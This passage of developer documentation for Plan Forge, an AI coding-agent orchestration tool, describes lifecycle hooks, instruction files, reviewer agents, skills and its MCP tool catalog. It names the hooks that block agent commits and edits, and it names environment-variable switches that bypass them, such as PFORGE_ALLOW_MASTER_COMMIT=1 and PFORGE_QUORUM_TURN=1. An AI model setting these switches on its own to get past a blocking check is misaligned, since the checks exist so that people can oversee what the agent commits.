Runs forge_secret_scan across the configured git range (scanSince, default HEAD~1) plus forge_env_diff to flag missing env keys. Blocks the slice when severity ≥ high. |
Yes (when blockOnSecrets: true) |
hooks.preDeploy |
PostSlice |
After every slice commit that matches the conventional-commit pattern (feat|fix|refactor|perf|chore|style|test). |
Runs forge_drift_report and compares the new drift score against the prior score. Emits a warning when the delta exceeds warnDeltaThreshold (default 10); emits a red banner when the score drops below scoreFloor (default 70). Fires only once per pforge run-plan invocation. |
No (advisory) | hooks.postSlice |
PreAgentHandoff |
On agent-to-agent turn boundaries in multi-agent mode, for example, when the executor agent hands off to the reviewer agent at the end of a slice. | Injects LiveGuard context (drift score, MTTR, open incidents) into the next agent's prompt. Also posts a snapshot to OpenClaw when openclaw.endpoint is configured. Skipped when the orchestrator sets PFORGE_QUORUM_TURN=1 during quorum fan-out (one of the documented bypasses, see Appendix U — CLI Internal). |
No (advisory) | hooks.preAgentHandoff |
PostRun (invokeAuditor) |
After every completed pforge run-plan run when hooks.postRun.invokeAuditor.onFailure is true and the run failed, or when everyNRuns is set and the run counter is a multiple of N. |
Triggers the plan-health auditor agent (A4). The auditor receives cross-run anomaly context from runWatch(mode: "cross-run") and writes its report to .forge/health/latest.md (configurable via forgeMaster.auditor.outputPath). |
No (advisory) | hooks.postRun.invokeAuditor |
Example .forge.json snippet for the PostRun auditor hook:
{
"hooks": {
"postRun": {
"invokeAuditor": {
"onFailure": true,
"everyNRuns": 10
}
}
}
}
To disable a LiveGuard hook, set the corresponding block in .forge.json to { "enabled": false } or, for finer-grained control, lower its threshold (e.g. blockOnSecrets: false keeps the PreDeploy scan running but downgrades it to advisory). Full schema in Appendix T — hooks.
One special hook lives outside both buckets above: PreCommit.mjs is a Node script in .github/hooks/ that runs synchronously before every commit during pforge run-plan. It now executes an ordered PreCommit chain declared in hooks.preCommit.chain[]. The built-in chain starts with master-branch-reject (refuse interactive commits on master/main) and then diff-classify (run forge_diff_classify against the staged diff). The first non-zero exit aborts the commit.
| Hook | Trigger | Effect | Blocks? | Override |
|---|---|---|---|---|
PreCommit |
Before every git commit during pforge run-plan. |
Runs each hooks.preCommit.chain[] entry in order. The default chain begins with master-branch-reject (blocks unauthorized commits on master/main) and then diff-classify (blocks high/critical findings from forge_diff_classify). First non-zero exit aborts the chain. |
Yes | Set PFORGE_ALLOW_MASTER_COMMIT=1 for one invocation, or edit .forge.json#hooks.preCommit.chain to add/remove entries. Discouraged, the defaults exist because LiveGuard runs caught several accidental-master-commit incidents in the v3.3.x sweeps. |
When the orchestrator needs to fire a hook, it looks for configuration in this order, first source that yields a non-empty value wins, with a built-in default at the end:
PFORGE_DISABLE_TEMPERING=1, PFORGE_ALLOW_MASTER_COMMIT=1, PFORGE_QUORUM_TURN=1. See Appendix U — Feature Toggles and CLI Internal for the full list..forge.json#hooks for LiveGuard hooks, or the matching entry in .github/hooks/plan-forge.json for session hooks..sh/.ps1 file is treated as "hook disabled" rather than an error. This lets you delete an unused hook script without editing the JSON.orchestrator.mjs. The defaults are deliberately conservative: every hook is enabled, every blocking hook actually blocks, every advisory hook actually emits its advisory.You can add scripts to existing buckets without modifying the orchestrator. For session hooks, drop a new script into .github/hooks/scripts/ and append an entry to the appropriate array in plan-forge.json; the next agent session picks it up. For LiveGuard hooks, the contract is fixed by the orchestrator, you can't add new ones, but you can swap a hook's behavior by wrapping the underlying tool (e.g. point hooks.preDeploy.scanSince at a wider git range, or pre-populate .forge/secret-scan-cache.json with a custom scanner's output).
A representative custom SessionStart hook that injects organization-specific reminders lives in templates/.github/hooks/scripts/session-start.ps1, copy it and edit the $reminders block. The script must emit a single line of JSON in the form {"hookSpecificOutput":{"hookEventName":"SessionStart","additionalContext":"..."}} for the agent host to honor the injection.
Three levels of configuration, from team-wide to personal:
| Level | File | Scope | Committed? |
|---|---|---|---|
| Team | .forge.json | Shared project config (presets, models, escalation) | Yes |
| Personal | preferences.json | Individual developer preferences | No (.gitignore) |
| Editor | .vscode/settings.json | VS Code and Copilot settings | Yes (recommended) |
Personal preferences override team config for the individual developer. Editor settings control VS Code behavior (agent mode enabled, prompt files, etc.).
For a field-by-field schema of .forge.json, every settable key with type, default, example, and change impact, see Appendix T — .forge.json Reference. For everything that lives outside .forge.json, provider API keys, server ports, orchestrator timing, see Appendix U — Environment Variables Reference.
📄 Full reference: CUSTOMIZATION.md on GitHub
The guardrail system: what each file covers, when it activates, and how agents review your code.
Each instruction file has an applyTo glob pattern in its YAML frontmatter. When you edit a file matching that pattern, the instruction auto-loads into the AI's context. No manual action needed, it's the difference between drowning the AI in every rule you have and having the right guidance whisper only when it's relevant. (For full details on writing your own applyTo patterns, see Chapter 9.)
---
description: Security best practices, input validation, auth, secrets
applyTo: "**/auth/**,**/security/**,**/middleware/**"
---
# Security Rules
- Parameterized queries only, never string interpolation in SQL
- Input validation at system boundaries
- No secrets in code, use environment variables or secret managers
...
Say you ask Copilot Chat to make a change to src/auth/token-validator.cs. Here's what auto-loads, and why each one matters:
| File that loads | Why it matched | What it whispers to the AI |
|---|---|---|
architecture-principles.instructions.md | Universal, applyTo: "**" | Stop! Before writing code, ask the 5 architecture questions. Don't bypass scope, don't skip tests. |
security.instructions.md | Path matched **/auth/** | Parameterized queries only. No secrets in code. Validate inputs at every boundary. OWASP Top 10 defense patterns. |
auth.instructions.md | Path matched **/auth/** | JWT/OIDC patterns, token expiry rules, RBAC enforcement, multi-tenant isolation guards. |
testing.instructions.md | Universal, applyTo: "**" | Tests required for new behavior. Use the project's test framework. Cover edge cases (expired token, tampered signature). |
The AI now has 4 focused instruction files in its context, not 17. If you switch to editing src/db/UserRepository.cs, security stays loaded but auth swaps out for database.instructions.md. The right rules whisper at the right time, without you doing anything.
Below is the full catalog: which files exist, what each covers, and which patterns trigger them.
These four files ship with every preset, they form the universal baseline:
| File | applyTo | Purpose |
|---|---|---|
architecture-principles | ** | 5 questions before coding, 4-layer architecture, separation of concerns |
git-workflow | ** | Conventional commits, push reminders, version-aware messaging |
ai-plan-hardening-runbook | docs/plans/** | Quick-reference when editing plan files |
status-reporting | docs/plans/**, .forge/** | Standard output templates for orchestration updates |
Each preset installs 17 domain-specific instruction files. They auto-load based on what you're editing:
| File | Domain | Loads When Editing |
|---|---|---|
api-patterns | REST conventions, pagination, error responses | Controllers, routes, endpoints |
auth | JWT/OIDC, RBAC (role-based access control), multi-tenant isolation | Auth modules, middleware |
caching | Redis, in-memory cache, TTL strategies | Cache services, config |
database | ORM/query patterns, migrations, connections | Repositories, SQL, models |
dapr | Dapr sidecar patterns, pub/sub, state management | Dapr config, service invocation |
deploy | Dockerfiles, health checks, container optimization | Dockerfiles, compose, k8s |
errorhandling | Exception hierarchy, ProblemDetails (RFC 7807 standard JSON error responses), error boundaries | Error handlers, middleware |
graphql | Schema design, resolvers, query patterns, Hot Chocolate / Apollo | GraphQL types, resolvers |
messaging | Pub/sub, job queues, event-driven patterns | Event handlers, message consumers |
multi-environment | Dev/staging/prod config, environment detection | Config files, env setup |
naming | Naming conventions, file organization, namespace rules | All code files |
observability | OpenTelemetry, structured logging, metrics | Logging, tracing, health |
performance | Hot/cold path analysis, allocation reduction | Performance-critical code |
security | Input validation, secret management, CORS | Auth, security, middleware |
testing | Unit tests, integration tests, test containers | Test files |
version | Semantic versioning, commit-driven bumps | Version files, changelogs |
project-principles | Activates when PROJECT-PRINCIPLES.md exists | Plan files, reviews |
frontend.instructions.md for React/Vue patterns. The azure-iac preset replaces several app-specific files with Bicep/Terraform equivalents.
Every instruction file includes Temper Guards (shortcut prevention tables) and Warning Signs (observable anti-patterns). These help agents avoid common quality erosion and help reviewers detect violations.
📄 Full reference: capabilities, Multi-Agent Setup — GitHub Copilot
Complete reference for the 14 reviewer agents, 16 slash-command skills (6 shared + 10 per stack), and the lifecycle hook system.
14 reviewer agents organized in three categories. Agents are read-only, they audit code but can't edit files.
Vary by preset, examples for dotnet:
| Agent | Reviews |
|---|---|
| architecture-reviewer | Layer separation, dependency direction, SOLID |
| database-reviewer | Query patterns, migrations, connection management |
| deploy-reviewer | Dockerfile, health checks, container optimization |
| performance-reviewer | Hot paths, allocations, async patterns |
| security-reviewer | Input validation, auth, secrets, OWASP |
| test-runner | Test coverage, test patterns, mocking strategy |
Shared across all presets, same expertise regardless of language:
| Agent | Reviews |
|---|---|
| api-contract-reviewer | API versioning, backward compatibility, OpenAPI |
| accessibility-reviewer | WCAG 2.2, semantic HTML, ARIA, keyboard nav |
| multi-tenancy-reviewer | Tenant isolation, data leakage, RLS, cache separation |
| cicd-reviewer | Pipeline safety, secrets, rollback strategies |
| observability-reviewer | Structured logging, distributed tracing, metrics |
| dependency-reviewer | CVEs, outdated packages, license conflicts |
| compliance-reviewer | GDPR, CCPA, SOC2, PII handling, audit logs |
| error-handling-reviewer | Exception hierarchy, error boundaries, ProblemDetails |
Drive the 7-step pipeline with handoff buttons between stages:
| Agent | Pipeline Step | What It Does |
|---|---|---|
| specifier | Step 0 | Interviews you, produces specification |
| preflight | Step 1 | Verifies prerequisites, checks environment readiness |
| plan-hardener | Step 2 | Converts spec into hardened execution contract |
| executor | Step 3 | Executes slices, validates gates |
| reviewer-gate | Step 5 | Independent audit for drift and compliance |
| shipper | Step 6 | Commits, updates roadmap, captures lessons |
Skills are multi-step procedures the AI runs end-to-end, they read files, write files, run terminal commands, and emit events the dashboard can watch. Unlike agents (which review) and hooks (which gate), skills do work. There are two tiers: shared skills installed across every preset, and stack-specific skills tailored to the chosen language.
Every skill is a single Markdown file with YAML frontmatter followed by numbered ### N. Step Name sections. The skill-runner parses the file into a step DAG, executes bash blocks per step, and emits lifecycle events to the WebSocket hub. The contract:
| Frontmatter field | Required | Purpose |
|---|---|---|
name | Yes | Slash-command alias (the file's directory name). name: database-migration → /database-migration. |
description | Yes | One-paragraph trigger guidance. The classifier matches user prompts against this field. Best practice: include USE FOR and DO NOT USE FOR phrases. |
argument-hint | Optional | One-line example of the argument shape, surfaced in the slash-command picker. |
tools | Optional | Allow-list of tools the skill may invoke. Inline (tools: [run_in_terminal, read_file]) or block list. Enforces least-privilege at runtime. |
After the frontmatter, three Markdown sections are recognized by the runner:
## Steps, the main body. Each ### N. Step Name heading defines one step; bash fences inside are executed in order. A step with no bash block is informational and auto-passes.## Safety Rules, bullet list of invariants. Surfaced in the dashboard and injected into the skill's context.## Persistent Memory, optional. Block appended to the skill's L2 capture so OpenBrain remembers cross-run lessons.Two structural patterns are recognized inside step bodies:
If <condition> → <action>. If the action contains the word skip, the runner aborts the current step's remaining commands. Used for early-exit paths like “If migration fails → rollback & STOP.”Every skill execution emits four event types on the hub (cataloged in Appendix V — Skills events):
| Event | When | Payload |
|---|---|---|
skill-started | Once, at entry | { skillName, stepCount } |
skill-step-started | Before each step | { skillName, stepNumber, stepName } |
skill-step-completed | After each step | { skillName, stepNumber, stepName, status, duration } |
skill-completed | Once, at exit | { skillName, passed, failed, duration } |
/database-migration add user_profiles table. The most common path; works in VS Code Copilot, Claude, Cursor, and Codex once setup.ps1 -Agent <name> has run.forge_run_skill with { name, args }. Returns the same lifecycle events plus a structured result envelope.POST /api/tool/forge_run_skill through the generic dispatcher (see Appendix W). Used by the dashboard and any external integration.The orchestrator can also defer a skill into the decision tray when it wants a human to choose; clients query GET /api/skills/pending and resolve through POST /api/skills/{accept,reject,defer} (full surface in Appendix W — Skills).
Six skills ship under presets/shared/skills/ and install regardless of language. These are the cross-cutting workflows.
| Skill | Invocation | What it does | Key tools |
|---|---|---|---|
audit-loop | /audit-loop [--max=N --env=dev] | Recursive scan → triage → fix until findings converge to zero. The orchestrator's drain loop, exposed as a one-shot. | forge_tempering_*, forge_bug_register, forge_triage_route |
forge-execute | /forge-execute | Guided plan execution: list plans → estimate cost → execute → report. The friendly path for new users. | forge_run_plan, forge_estimate_quorum, forge_cost_report |
forge-quench | /forge-quench <plan> | Final hardening pass before committing a plan, runs validators and the completeness sweep. | forge_validate, forge_sweep |
forge-troubleshoot | /forge-troubleshoot | Diagnose common Plan Forge issues: missing API keys, stale orchestrator logs, broken hub, hook conflicts. | forge_smith, forge_diagnose |
health-check | /health-check | Forge diagnostic chain: forge_smith → forge_validate → forge_sweep. Run on a clean checkout before opening a PR. | forge_smith, forge_validate, forge_sweep |
security-audit (shared variant) | /security-audit | Generic OWASP scan, secrets detection, severity report. Stack presets override with language-specific scanners. | forge_secret_scan, forge_dep_watch |
Ten skills ship per language preset under presets/<stack>/.github/skills/. Same skill names across stacks, but the implementation calls the language's idiomatic toolchain, database-migration uses Knex / Prisma for TypeScript, EF Core for .NET, Alembic for Python, GORM for Go, and so on.
| Skill | Invocation | What it does |
|---|---|---|
api-doc-gen | /api-doc-gen | Generate or update OpenAPI spec, validate spec-to-code consistency. |
code-review | /code-review | Comprehensive review: architecture, security, testing, patterns. |
database-migration | /database-migration "<change>" | Generate, review, test locally, deploy to staging, with rollback. Five-step DAG with conditional early-exit on migration failure. |
dependency-audit | /dependency-audit | Scan for vulnerabilities, outdated packages, license issues. Wraps npm audit / dotnet list package --vulnerable / pip-audit per stack. |
forge-quench (stack variant) | /forge-quench | Same shape as shared variant, but invokes the stack's linter and test runner. |
onboarding | /onboarding | Walk a new developer through project setup, architecture, and first task. |
release-notes | /release-notes "<tag>" | Generate release notes from git history and CHANGELOG. Output formatted for GitHub Release, Slack, or email. |
security-audit (stack variant) | /security-audit | Language-specific OWASP scan plus shared scanners. Wraps semgrep / bandit / brakeman / govulncheck per stack. |
staging-deploy | /staging-deploy | Build, push, migrate, deploy, and verify on staging with health-check probe. |
test-sweep | /test-sweep [category] | Run all test suites (unit, integration, API, E2E) and aggregate results into a summary report. Run before the Review Gate. |
The minimum viable skill is one frontmatter block + one numbered step. Drop it under .github/skills/<name>/SKILL.md and it's available as /<name> in the next chat session. Example:
---
name: deploy-canary
description: "Deploy current branch to canary environment and watch metrics for 10 minutes. USE FOR: gradual rollout. DO NOT USE FOR: hotfixes (use /staging-deploy)."
argument-hint: "[optional: minutes to watch, default 10]"
tools: [run_in_terminal, read_file]
---
# Deploy Canary Skill
## Steps
### 1. Build & Push
```bash
docker build -t myapp:canary .
docker push myregistry/myapp:canary
```
### 2. Apply
```bash
kubectl set image deployment/myapp myapp=myregistry/myapp:canary -n canary
kubectl rollout status deployment/myapp -n canary --timeout=2m
```
### Conditional: Rollout Failure
> If rollout fails → immediately `kubectl rollout undo`, report the error, and STOP. Do not proceed to watch.
### 3. Watch
```bash
sleep ${MINUTES:-600}
kubectl logs -l app=myapp -n canary --tail=200
```
## Safety Rules
- NEVER deploy from a dirty working tree
- ALWAYS rollback within 60s if 5xx rate exceeds 1%
Authoring guidance:
IF NOT EXISTS, check-then-act patterns, and explicit cleanup steps.## Persistent Memory. The capture is routed to L2 and, if configured, L3 OpenBrain.presets/<stack>/.github/skills/ is a worked example. The richest are database-migration (5-step DAG with conditional rollback) and audit-loop (recursive convergence loop).
Hooks run automatically during agent sessions, no manual activation:
| Hook | When | What It Enforces |
|---|---|---|
| SessionStart | Session begins | Injects Project Principles, current phase, forbidden patterns |
| PreToolUse | Before file edit | Blocks edits to paths listed in plan's Forbidden Actions |
| PostToolUse | After file edit | Auto-formats, warns on TODO/FIXME/stub markers |
| Stop | Session ends | Warns if code modified but no test run detected |
📄 Full reference: capabilities, Multi-Agent Setup — GitHub Copilot
102 MCP tools across 8 categories, Core, LiveGuard, Watcher, Crucible, Tempering, Bug Registry, Testbed, Forge-Master, plus REST API, WebSocket hub, telemetry, and cost tracking. The integration layer.
A single Node.js process runs three subsystems, the nervous system that lets all your tools talk to each other:
102 MCP tools across 8 categories (Core, LiveGuard, Watcher, Crucible, Tempering, Bug Registry, Testbed, Forge-Master) exposed via Model Context Protocol. Copilot, Claude, Cursor call these as function calls.
Dashboard UI, REST API, static files. ~100 endpoints for programmatic access.
Real-time events. Dashboard subscribes for live slice progress.
This chapter is split across three pages for clarity:
Starting the server, VS Code auto-start, and the essential tools every Forge user needs: forge_capabilities, forge_run_plan, forge_plan_status, forge_smith, and more.
Complete tool tables for all 8 categories (102 tools), REST API endpoints, WebSocket hub events, OTLP telemetry, cost tracking, SDK, and API key configuration.
forge_capabilities before anything else, it returns the full live API surface including tool schemas, config options, available extensions, and per-tool error codes. Always authoritative.
📄 Full reference: capabilities, EVENTS.md on GitHub, tools.json on GitHub
Start the server, verify it's running, and call your first forge tools in under five minutes.
# Install dependencies (first time only)
cd pforge-mcp && npm install && cd ..
# Full server: MCP + HTTP + WebSocket
node pforge-mcp/server.mjs
# Dashboard only (no MCP stdio)
node pforge-mcp/server.mjs --dashboard-only
# Custom project path
node pforge-mcp/server.mjs --project /path/to/project
With .vscode/mcp.json configured (created by setup.ps1 / setup.sh), the server auto-starts when Copilot calls any forge tool, you don't need to start it manually.
# Check the health endpoint
curl http://localhost:3100/api/status
# Or open the dashboard in your browser
open http://localhost:3100
These are the tools you'll use most often. Start with forge_capabilities to discover the full surface; use forge_run_plan to execute your work.
forge_capabilities at the start of a session, it returns the live API surface including tool schemas, config options, extensions, and per-tool error codes.
Returns the complete, always-authoritative API surface. Call this first.
forge_capabilities({})
Returns: tool schemas, intents, config keys, available extensions, per-tool error codes.
Diagnose your setup: VS Code config, Node version, MCP connectivity, preset health, version currency. Run this when something isn't working.
forge_smith({})
Execute a hardened plan file. Spawns workers, validates gates after each slice, tracks tokens and cost. This is the core execution command.
// Estimate cost before running (recommended)
forge_run_plan({ plan: "docs/plans/Phase-1.md", estimate: true })
// Execute
forge_run_plan({ plan: "docs/plans/Phase-1.md" })
// Execute with quorum mode
forge_run_plan({ plan: "docs/plans/Phase-1.md", quorum: "auto" })
// Resume from a specific slice
forge_run_plan({ plan: "docs/plans/Phase-1.md", resumeFrom: 3 })
Quorum modes: auto (adaptive), power (flagship models, threshold 5), speed (fast models, threshold 7), false (single model, no quorum).
Poll the status of the currently running (or most recent) plan execution. Returns per-slice results, tokens consumed, duration, and gate outcomes.
forge_plan_status({})
Abort the currently running plan execution. The orchestrator finishes the current slice's work-in-progress before stopping.
forge_abort({})
Multi-model bug investigation: provide a source file (and optionally models) and receive root-cause analysis plus fix recommendations.
forge_diagnose({ file: "src/services/billing.ts" })
Cross-artifact consistency scoring (0–100 across 4 dimensions). Checks that your plans, code, tests, and docs are in sync. Run before shipping. plan is required and can point at a plan markdown or a source file.
forge_analyze({ plan: "docs/plans/Phase-1-AUTH-PLAN.md" })
Project the cost of a plan under all four quorum modes before executing. Always call this instead of hand-computing costs.
forge_estimate_quorum({ planPath: "docs/plans/Phase-1.md" })
forge_capabilities({}) to see the live API surfaceforge_smith({}) to confirm everything is greenforge_estimate_quorum({ planPath: "…" }) before any executionforge_run_plan({ plan: "…" }) to execute your planforge_plan_status({}) to track progressforge_analyze({ plan: "…" }) to confirm artifact consistency📄 Full reference: capabilities, EVENTS.md on GitHub, tools.json on GitHub
Complete tool tables for all 102 MCP tools across 8 categories, REST API endpoints, WebSocket hub events, OTLP telemetry, cost tracking, SDK, and API key configuration.
Every tool is callable from Copilot Chat, Claude Code, Cursor, or any MCP-compatible client. Tools are grouped by station / subsystem. The four "station" categories (Crucible, LiveGuard, Tempering, Bug Registry / Testbed) map directly to the four shop stations; the rest are cross-cutting infrastructure.
forge_capabilities before anything else, it returns the full live API surface including tool schemas, config options, available extensions, and per-tool error codes. Always authoritative.
Everything that powers the Smelt and Forge stations plus the cross-cutting surfaces (skills, memory, cost, search, review queue, notifications, image generation, meta-bug filing).
| Tool | Description |
|---|---|
| Diagnostics & setup | |
forge_smith | Diagnose environment, VS Code config, setup health, version currency. The "shop inspector." |
forge_validate | Validate setup files, check counts match preset, no placeholders |
forge_sweep | Scan for TODO/FIXME/HACK/stub/placeholder markers |
forge_capabilities | Machine-readable API surface, tools, intents, config, extensions, error codes |
forge_status | Show phases from DEPLOYMENT-ROADMAP.md with status |
| Plan execution (Forge station) | |
forge_run_plan | Execute a hardened plan: spawn workers, validate gates, track tokens. Supports --quorum=auto|power|speed|false |
forge_abort | Abort the currently running plan execution |
forge_plan_status | Latest execution status, per-slice results, tokens, duration |
forge_diff | Compare changes against the plan's Scope Contract, detect drift |
forge_new_phase | Create a new phase plan file + roadmap entry |
| Analysis & estimation | |
forge_analyze | Cross-artifact consistency scoring (0–100, 4 dimensions) |
forge_diagnose | Multi-model bug investigation, root cause + fix recommendations |
forge_estimate_quorum | Projected cost of a plan under all four quorum modes (auto/power/speed/false). Always call this before showing cost estimates, never hand-compute. |
forge_estimate_slice | Per-slice cost estimate with confidence (heuristic vs historical) |
forge_doctor_quorum | Diagnose quorum-mode availability and routing issues |
forge_graph_query | Query the Plan Forge knowledge graph (built post-Slice via postSlice hook) |
forge_search | Cross-artifact search across plans, runs, bugs, memory |
| Cost & performance | |
forge_cost_report | Cost tracking: total spend, per-model breakdown, monthly trend. Authoritative source for actual spend. |
forge_timeline | Unified chronological view of runs, incidents, bugs, deploys, fm-turns, crucible events. 9 sources. |
forge_home_snapshot | Snapshot of the “home” dashboard tile state, aggregate health surface |
| Skills & review | |
forge_run_skill | Execute a skill programmatically with step-level tracking |
forge_skill_status | Recent skill execution events from the hub |
forge_review_add | Queue a review item (used by Step 5 reviewer agents) |
forge_review_list | List open / resolved review items |
forge_review_resolve | Resolve a review item with verdict + notes |
forge_patterns_list | List captured architectural patterns for a project |
| Memory (Learn station bridge) | |
forge_memory_capture | Normalise and broadcast a memory-captured hub event for OpenBrain |
forge_memory_report | Aggregate report of recent captures, patterns, decisions |
| Notifications & bridge | |
forge_notify_send | Send a notification via the configured Remote Bridge (Slack / Teams / PagerDuty / OpenClaw / Telegram / Discord) |
forge_notify_test | Test the Remote Bridge configuration end-to-end |
forge_delegate_to_agent | Hand a sub-task to a specific reviewer agent in multi-agent mode |
| Extensions & meta | |
forge_ext_search | Search the community extension catalog |
forge_ext_info | Detailed info about a specific extension |
forge_org_rules | Export org custom instructions, consolidate instruction files for GitHub org-level Copilot config |
forge_meta_bug_file | File a self-repair bug against Plan Forge itself (plan-defect / orchestrator-defect / prompt-defect) |
forge_triage_route | Route a finding to the appropriate lane (bug / spec / classifier), powers the audit-loop drain |
forge_generate_image | Generate images via Grok Aurora or DALL-E, save with format conversion |
The Guard station. Detect drift, capture incidents, watch dependencies, scan for secrets, propose fixes, all running against shipped code. Chapter 17 — LiveGuard Tools Reference covers each one in depth (flags, thresholds, output shapes, severity matrix). Listed here for completeness.
| Tool | Description |
|---|---|
forge_liveguard_run | Composite scan: drift + sweep + secrets + regression + deps + alerts + health. The "everything" command. |
forge_drift_report | Score codebase against architecture guardrail rules; track drift over time |
forge_secret_scan | High-entropy secret detection, values always redacted |
forge_dep_watch | Scan dependencies for CVEs; alert on new vulnerabilities |
forge_regression_guard | Extract validation gates from plans, execute against codebase |
forge_incident_capture | Record incidents with severity, affected files, MTTR tracking |
forge_alert_triage | Read incidents and drift violations, rank by priority |
forge_env_diff | Environment variable key divergence across .env files |
forge_fix_proposal | Generate scoped 1–2 slice fix plan from a regression / drift / incident finding |
forge_health_trend | Aggregate drift, cost, incidents, model performance into health score 0–100 |
forge_hotspot | Identify git-churn hotspots, files that change most frequently |
forge_runbook | Generate an operational runbook from a hardened plan file |
forge_deploy_journal | Record deployments with version, deployer, notes |
forge_quorum_analyze | Assemble structured quorum prompt from LiveGuard data, no LLM calls |
Read-only observation of another project's forge run from a second VS Code session. See Chapter 19 — The Watcher.
| Tool | Description |
|---|---|
forge_watch | Snapshot or analyze (claude-opus-4.7) mode. Returns counts, anomalies, recommendations, diff cursor. |
forge_watch_live | Live tail, streams events for fixed duration via target's WebSocket hub or events.log polling. |
The Smelt station. Interview-driven plan intake with a critical-fields gate that refuses to finalize until build-command, test-command, scope, gates, and forbidden-actions are all satisfied. Includes a deterministic Spec Kit importer. See Chapter 5 — Crucible.
| Tool | Description |
|---|---|
forge_crucible_submit | Submit a raw idea or feature request to start an interview |
forge_crucible_ask | Answer the next interview question. Supports an optional questionId to refuse on out-of-sync clients with ASK_QUESTION_MISMATCH. |
forge_crucible_preview | Preview the draft plan + flag any unresolved CRITICAL_FIELDS |
forge_crucible_finalize | Finalize into docs/plans/Phase-NN.md. Refuses if plan exists with PLAN_ALREADY_EXISTS; pass overwrite: true to bypass. Refuses on missing CRITICAL_FIELDS with CRITICAL_FIELDS_MISSING. |
forge_crucible_list | List all in-flight and finalized smelts |
forge_crucible_abandon | Abandon an in-flight smelt |
forge_crucible_import | Deterministic Spec Kit importer. Maps a Spec Kit checkout (spec.md + plan.md + tasks.md + optional constitution.md) into a Plan Forge smelt under .forge/crucible/. No LLM calls. Supports --dry-run and --json. |
forge_crucible_status | Inspect imported smelts. Lists all smelts when called without an id, or returns the full smelt record (metadata + draft plan) when given a smelt id. |
Closed-loop self-tempering, scan, triage, fix, repeat until convergence. The audit-loop drain is opt-in via .forge.json → audit.mode = "off" | "auto" | "always". See Audit Loop Deep Dive.
| Tool | Description |
|---|---|
forge_tempering_scan | Run a single tempering scanner (mutation, content-audit, etc.) |
forge_tempering_run | Run the full standard scanner sequence (10 scanners) |
forge_tempering_drain | Iterate scan → triage → fix until convergence or maxRounds |
forge_tempering_status | Latest tempering run status, scanners, findings |
forge_tempering_approve_baseline | Approve current findings as the new baseline for visual-diff scanners |
The Learn station. Fingerprint-deduped bug registry: register, fix, validate, remember. See Chapter 23 — The Bug Registry.
| Tool | Description |
|---|---|
forge_bug_register | Register a new bug with title, severity, fingerprint inputs, file paths |
forge_bug_list | List bugs by status, severity, or fingerprint match |
forge_bug_update_status | Update status (open / in-progress / fixed / verified / closed). Accepts both newStatus and status. |
forge_bug_validate_fix | Run the bug's validation gate against the current codebase to confirm a fix landed |
Replay scenarios against a dedicated fixture repo (typically plan-forge-testbed/) to prove fixes don't regress. See Chapter 24 — The Testbed.
| Tool | Description |
|---|---|
forge_testbed_run | Execute a scenario against the testbed fixture |
forge_testbed_happypath | Run the happy-path scenario set as a smoke test |
forge_testbed_findings | Aggregate findings from the latest testbed run |
Intent classifier with embedding cache and quorum advisory mode. Classifies open-ended prompts, fetches OpenBrain memory, and chains read-only forge tools on your behalf. The bulk of the Forge-Master surface is exposed via /api/forge-master/* REST routes (see below) plus the dashboard's Studio tab; only the one-shot reasoning entry-point is an MCP tool.
| Tool | Description |
|---|---|
forge_master_ask | One-shot reasoning entry point. Accepts a free-form message; returns lane classification, tool-call trace, and synthesized reply. Use for open-ended questions instead of chaining tools yourself. |
/api/forge-master/cache-stats liveliness endpoint.
The REST surface is documented in full in Appendix W — REST API Reference: every endpoint, request/response shape, status codes, authentication model, and worked examples. The summary below points at the most-used subsystems, click through to Appendix W for the per-endpoint detail.
| Subsystem | What it covers |
|---|---|
| Discovery | Liveness, version, capability manifest, well-known endpoint. |
| Plan execution & runs | Trigger/abort runs, traces, replay, plans, workers. |
| Search, timeline, hub | Cross-surface search, unified timeline, WebSocket upgrade. |
| Memory | Capture, drain, search, OpenBrain stats. |
| Crucible | Idea-smelt lifecycle: submit → ask → preview → finalize. |
| LiveGuard | Drift, incidents, deploy journal, regression guard, runbooks, secret scan, dep watch. |
| Bridge & approvals | The only cross-boundary auth surface (HMAC via PFORGE_BRIDGE_SECRET). |
| Forge-Master | Conversational entrypoint, chat, prefs, cache stats. |
| Generic MCP dispatcher | POST /api/tool/:name, invoke any of the 106 MCP tools over REST. |
127.0.0.1 only and has no authentication layer of its own; the OS user account is the access boundary. The only exception is the bridge approval surface, which is HMAC-protected. See Appendix W — Authentication, binding, and CORS for the full discussion.
Connect to ws://localhost:3101 for real-time events. The dashboard uses this for live progress updates.
| Event | When |
|---|---|
connected | Client connects, includes event history replay |
run-started | Plan execution begins |
slice-started | Slice begins execution |
slice-completed | Slice passes all validation gates |
slice-failed | Slice or gate fails |
slice-escalated | Slice escalated to quorum for multi-model consensus |
run-completed | All slices finish |
run-aborted | Execution aborted via forge_abort |
skill-started | Skill execution begins |
skill-completed | Skill finishes all steps |
approval-requested | Bridge pauses for external approval |
bridge-notification-sent | Webhook dispatched (Telegram, Slack, Discord) |
watch-snapshot-completed | Watcher built a snapshot of a target project |
watch-anomaly-detected | Watcher detected one or more anomalies (stalled, slice-failed, quorum-dissent, etc.) |
watch-advice-generated | Watcher analyze-mode produced narrative advice from frontier model |
fm-turn | Forge-Master turn (intent classification + tool-call trace + reply). Surfaces in the unified Timeline. |
quorum-estimate | Forge-Master quorum advisory cost estimate, emitted before model dispatch so clients can cancel |
memory-captured | Decision / pattern / postmortem captured to OpenBrain |
crucible-started / crucible-question / crucible-finalized | Crucible interview lifecycle events |
tempering-round-completed | One round of audit-loop drain finished (scan → triage → fix) |
slice-orphan-warning | Failed slice's worker deliverables were staged but not committed; recovery commands available |
Every plan execution emits OpenTelemetry (OTLP) traces stored in .forge/runs/<timestamp>/traces.json:
The orchestrator tracks tokens and computes cost per slice using a 23-model pricing table:
.forge/cost-history.json.forge/model-performance.json tracks success rate, avg cost, avg duration per modelThe orchestrator auto-selects the cheapest model with >80% historical pass rate. Use --estimate to preview costs before executing.
The pforge-sdk/ package provides a JavaScript/TypeScript API for building integrations:
import { createForgeClient } from 'pforge-sdk';
const forge = createForgeClient({ baseUrl: 'http://localhost:3100' });
// Run smith diagnostics
const health = await forge.smith();
// Get cost report
const cost = await forge.costReport();
// Execute a plan
const run = await forge.runPlan('docs/plans/Phase-1.md', {
mode: 'estimate'
});
The SDK is currently in scaffold stage (v0.1.0), API surface defined, implementation in progress.
API keys for external providers (xAI Grok, OpenAI) are resolved in order: environment variable → .forge/secrets.json → null.
{
"XAI_API_KEY": "xai-...",
"OPENAI_API_KEY": "sk-..."
}
The .forge/ directory is gitignored by default, secrets never enter version control.
